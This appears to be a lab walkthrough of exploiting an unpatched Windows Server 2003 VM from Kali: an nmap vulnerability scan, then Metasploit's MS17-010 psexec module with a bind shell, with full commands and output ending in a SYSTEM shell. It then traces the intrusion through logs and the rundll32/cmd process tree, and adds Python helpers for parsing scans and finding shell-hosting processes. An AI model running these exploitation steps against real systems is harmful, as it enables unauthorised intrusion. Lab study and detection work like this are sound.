Testing Windows 2003 with msf from Kali
Test environment:
Windows 2003: 192.168.145.132
Kali: 192.168.145.146
From Kali, check which ports are open on Windows 2003 and whether the services on those ports have known vulnerabilities:
nmap --script=vuln 192.168.145.132
root@kali:~# nmap --script=vuln 192.168.145.132
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-01 23:26 EDT
Nmap scan report for bogon (192.168.145.132)
Host is up (0.0033s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
21/tcp open ftp
|_sslv2-drown:
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1027/tcp open IIS
MAC Address: 00:0C:29:3E:BE:DF (VMware)
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 150.89 seconds
As can be seen, the MS08-067 and MS17-010 vulnerabilities are both present.
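To turn output like the scan above into a remediation list rather than reading it by eye, here is an added example (not part of the original post) that parses the `--script=vuln` report format and keeps only the NSE scripts whose block reports `State: VULNERABLE`, together with the port (or host-level) they apply to and the CVE ids they cite. The sample input is constructed from the output shown above and abbreviated.

```python
import re

# Constructed sample, abbreviated from the nmap --script=vuln output quoted above.
SAMPLE_SCAN = """\
Nmap scan report for bogon (192.168.145.132)
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
Host script results:
| smb-vuln-ms08-067:
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 150.89 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for .*?(\d+\.\d+\.\d+\.\d+)\)?\s*$")
PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+open")
SCRIPT_RE = re.compile(r"^\|_?\s*([a-z0-9][a-z0-9-]*):(?:\s|$)")  # "| smb-vuln-ms17-010:"; "| State:" is not a header
STATE_RE = re.compile(r"State:\s*VULNERABLE")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")

def parse_vuln_scan(text):
    """Map host -> {script id: {"where": port or "host", "cves": [...]}} for scripts reporting State: VULNERABLE."""
    findings, ctx = {}, {"host": None, "where": "host", "script": None}
    def flush():  # record the script block just finished, if it was flagged VULNERABLE
        s = ctx["script"]
        if s and s["vulnerable"]:
            findings[ctx["host"]][s["id"]] = {"where": s["where"], "cves": s["cves"]}
        ctx["script"] = None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            flush()
            ctx["host"], ctx["where"] = m.group(1), "host"
            findings[ctx["host"]] = {}
        elif ctx["host"] is None:
            continue  # ignore banner text before the first host report
        elif (m := PORT_RE.match(line)) or line.startswith("Host script results"):
            flush()
            ctx["where"] = m.group(1) if m else "host"
        elif m := SCRIPT_RE.match(line):
            flush()
            ctx["script"] = {"id": m.group(1), "where": ctx["where"], "vulnerable": False, "cves": []}
        elif ctx["script"]:
            ctx["script"]["vulnerable"] |= bool(STATE_RE.search(line))
            ctx["script"]["cves"] += [c for c in CVE_RE.findall(line) if c not in ctx["script"]["cves"]]
    flush()
    return findings
```

Scripts that end in `false` or an `NT_STATUS_*` error (like smb-vuln-ms10-054 and smb-vuln-ms10-061 above) are dropped because they never report `State: VULNERABLE`.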
MS17-010 is used as the example below.
Start msf and obtain a session on the remote host: msfconsole
msf5 > search ms17-010
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.145.132
rhosts => 192.168.145.132
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] 192.168.145.132:445 - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 192.168.145.132:445 - Filling barrel with fish... done
[*] 192.168.145.132:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.145.132:445 - [*] Preparing dynamite...
[*] 192.168.145.132:445 - Trying stick 1 (x64)...Miss
[*] 192.168.145.132:445 - [*] Trying stick 2 (x86)...Boom!
[*] 192.168.145.132:445 - [+] Successfully Leaked Transaction!
[*] 192.168.145.132:445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.145.132:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.145.132:445 - Reading from CONNECTION struct at: 0x87107010
[*] 192.168.145.132:445 - Built a write-what-where primitive...
[+] 192.168.145.132:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.145.132:445 - Selecting native target
[*] 192.168.145.132:445 - Uploading payload... PAPySZMA.exe
[*] 192.168.145.132:445 - Created \PAPySZMA.exe...
[+] 192.168.145.132:445 - Service started successfully...
[*] 192.168.145.132:445 - Deleting \PAPySZMA.exe...
[*] Started bind TCP handler against 192.168.145.132:4444
[*] Command shell session 1 opened (192.168.145.146:40349 -> 192.168.145.132:4444) at 2019-07-02 02:56:09 -0400
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ��������:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.145.132
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.145.2
Check the network connections on Windows 2003 and locate the connection record.
Add a login user: the addition succeeds, but the system keeps no record of it anywhere.
An anonymous logon appears in the Security log.
Look for the process: it is rundll32.exe, a Microsoft binary that can execute code inside DLL files. Because this utility is part of the Windows operating system, it can be used as a way to bypass AppLocker rules or software restriction policies. So if certain settings have not been locked down correctly in the system environment, a user can do things with this binary; they can also write their own DLL to bypass any restrictions or execute malicious JavaScript code:
Kill that process directly.
The program on the Kali side still runs.
Checking the network connection status, the PID is still unchanged, but the process can no longer be found.
In Event Viewer, nothing abnormal is found under Security, but something abnormal appears under System: status information for the Performance Logs and Alerts service.
Restart Windows 2003; the Kali side exits.
Install the process viewer procexp on Windows 2003 to inspect the programs: when Kali runs the program, a rundll32.exe process appears automatically together with a cmd child process. If only rundll32.exe is killed, commands can still be executed; only when the child process is killed as well does the remote-control program exit.
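The last observation (killing rundll32.exe alone leaves the cmd.exe child and the session alive) suggests what a responder's check should do: find every rundll32.exe that has a shell child or owns a network socket, and return its whole process subtree as the kill list, not just the parent. The following is an added example, not code from the original post; the process list and the netstat-style rows are constructed to mirror what procexp and the connection check above showed (bind shell on 192.168.145.132:4444).

```python
from collections import defaultdict

# Constructed process list (pid, ppid, name), modelled on the procexp view described above.
PROCESSES = [
    (4, 0, "System"),
    (512, 4, "smss.exe"),
    (636, 512, "winlogon.exe"),
    (680, 636, "services.exe"),
    (1100, 680, "svchost.exe"),
    (1488, 680, "rundll32.exe"),   # payload host started under the Service Control Manager
    (1520, 1488, "cmd.exe"),       # the interactive shell child that outlives its parent
    (1900, 1100, "rundll32.exe"),  # benign rundll32: no shell child, no socket
]
# Constructed rows in the shape of `netstat -ano`: (proto, local, remote, state, pid).
CONNECTIONS = [
    ("TCP", "192.168.145.132:4444", "192.168.145.146:40349", "ESTABLISHED", 1488),
    ("TCP", "0.0.0.0:445", "0.0.0.0:0", "LISTENING", 4),
]

SUSPECT_PARENT = "rundll32.exe"
SHELLS = {"cmd.exe", "powershell.exe"}

def build_tree(processes):
    """Return (children map ppid -> [pid], names map pid -> lowercase image name)."""
    children, names = defaultdict(list), {}
    for pid, ppid, name in processes:
        children[ppid].append(pid)
        names[pid] = name.lower()
    return children, names

def subtree(children, pid):
    """All pids rooted at pid, root first: everything here must go, or the session survives."""
    out, stack = [], [pid]
    while stack:
        p = stack.pop()
        out.append(p)
        stack.extend(children.get(p, []))
    return out

def find_shell_hosts(processes, connections):
    """Map each suspicious rundll32.exe pid to its full kill list and the sockets it owns."""
    children, names = build_tree(processes)
    socket_owner = defaultdict(list)
    for proto, local, remote, state, pid in connections:
        socket_owner[pid].append(f"{proto} {local} <-> {remote} {state}")
    hits = {}
    for pid, name in names.items():
        has_shell = name == SUSPECT_PARENT and any(names[c] in SHELLS for c in children.get(pid, []))
        if name == SUSPECT_PARENT and (has_shell or pid in socket_owner):
            hits[pid] = {"kill": subtree(children, pid), "sockets": socket_owner.get(pid, [])}
    return hits
```

On a live host the two input tables would come from `tasklist`/procexp and `netstat -ano`; the check also flags a rundll32.exe whose cmd child has already exited but which still owns the socket.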